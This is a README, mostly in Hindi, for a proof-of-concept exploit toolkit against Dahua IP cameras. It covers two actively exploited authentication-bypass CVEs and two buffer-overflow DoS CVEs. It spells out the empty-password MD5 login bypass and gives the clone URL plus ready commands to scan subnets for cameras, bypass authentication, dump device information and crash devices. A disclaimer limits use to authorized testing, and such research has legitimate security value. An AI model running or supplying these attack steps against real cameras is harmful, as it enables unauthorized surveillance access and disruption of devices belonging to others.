
Dahua IP कैमरा CVE अनुसंधान टूलकिट (CVE-2021-33044/33045, CVE-2025-31700/31701)
⚠️ विकासाधीन — ये स्क्रिप्ट्स प्रकाशित CVE विवरणों पर आधारित हैं और पूर्ण कार्यक्षमता की पुष्टि के लिए कमजोर उपकरणों के विरुद्ध आगे परीक्षण की आवश्यकता है।
चार गंभीर डाहुआ आईपी कैमरा कमजोरियों के लिए शोध और proof-of-concept स्क्रिप्ट्स।
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
By using these tools, you agree that:
1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
2. You will NOT use these tools for illegal activities
3. You accept full responsibility for your actions
4. The authors are NOT liable for any misuse or damage
Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.
| CVE | CVSS | प्रकार | स्थिति |
|---|---|---|---|
| CVE-2021-33044 | 9.8 CRITICAL | प्रमाणीकरण बायपास | CISA KEV (सक्रिय रूप से शोषित) |
| CVE-2021-33045 | 9.8 CRITICAL | प्रमाणीकरण बायपास | CISA KEV (सक्रिय रूप से शोषित) |
| CVE-2025-31700 | 8.1 HIGH | बफर ओवरफ्लो DoS | हालिया (2025) |
| CVE-2025-31701 | 8.1 HIGH | बफर ओवरफ्लो DoS | हालिया (2025) |
डाहुआ कैमरे /RPC2_Login पर challenge-response प्रमाणीकरण का उपयोग करते हैं:
Normal Login:
step1 = MD5("admin:realm:PASSWORD")
step2 = MD5("step1:random:step1")
Bypass (CVE-2021-33044/45):
step1 = MD5("admin:realm:") ← EMPTY password
step2 = MD5("step1:random:step1")
कमजोर फर्मवेयर खाली-पासवर्ड हैश स्वीकार करता है और एक वैध सत्र टोकन लौटाता है।
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit
# Install dependencies
pip install requests
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
# Single host with port
python dahua_scanner.py 192.168.1.100:8081
# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json
# Show help
python dahua_scanner.py --help
सामान्य डाहुआ पोर्ट: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044 # Single CVE
python dahua_exploit.py --help
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump # Dump device info after bypass
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp # TCP/37777 only
⚠️ चेतावनी: DoS स्क्रिप्ट लक्षित डिवाइस को क्रैश कर सकती है।
requests
अन्य सभी इम्पोर्ट Python मानक पुस्तकालय से हैं:
socket, struct, hashlib, threading, ipaddress, argparse, json
🚧 सक्रिय विकासाधीन
ये स्क्रिप्ट्स निम्न के आधार पर विकसित की गई हैं:
परीक्षण स्थिति:
यदि आपके पास परीक्षण के लिए कमजोर उपकरणों तक पहुंच है, तो योगदान और प्रतिक्रिया का स्वागत है।
कृपया किसी भी समस्या या गलत सकारात्मक की रिपोर्ट करें।
MIT लाइसेंस - LICENSE फ़ाइल देखें।
Umair Aziz
GitHub: @umair-aziz025
केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए।
| फ़ाइल | उद्देश्य | CVEs |
|---|
dahua_scanner.py | नेटवर्क खोज — सबनेट पर डाहुआ कैमरे खोजें | पहचान |
dahua_exploit.py | मल्टी-CVE स्कैनर — सभी कमजोरियों का परीक्षण | सभी |
dahua_auth_bypass.py | --dump विकल्प के साथ समर्पित प्रमाणीकरण बायपास | CVE-2021-33044/45 |
dahua_rce.py | बफर ओवरफ्लो DoS प्रोब | CVE-2025-31700/01 |